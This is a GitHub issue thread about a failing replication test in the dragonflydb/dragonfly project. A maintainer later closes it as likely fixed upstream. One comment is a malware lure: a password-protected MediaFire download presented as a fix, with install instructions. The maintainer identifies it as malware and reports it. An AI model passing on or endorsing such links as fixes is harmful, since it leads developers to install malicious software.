### ISSUE TITLE
replication_test.py::test_expiry fails

### ISSUE THREAD

**Issue by kostasrim** [dragonflydb/dragonfly#3586] opened 2024-08-28 06:58 UTC
See stack trace https://github.com/dragonflydb/dragonfly/actions/runs/10585760689/job/29333103864#step:6:903

**Comment by rajnikyadav** [comment] 2024-08-28 06:58
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by kostasrim** [comment] 2024-08-28 07:00
@rajnikyadav you are being reported for submitting malware

**Comment by chakaz** [comment] 2024-09-18 08:36
I can't reproduce this, and it is likely to have been fixed by https://github.com/romange/helio/commit/ff2622222c9b0f091a37f466779cbfdc56df8344?diff=unified&w=0

**Closed by chakaz** 2024-09-18 08:36 UTC
Labels: bug, failing-test
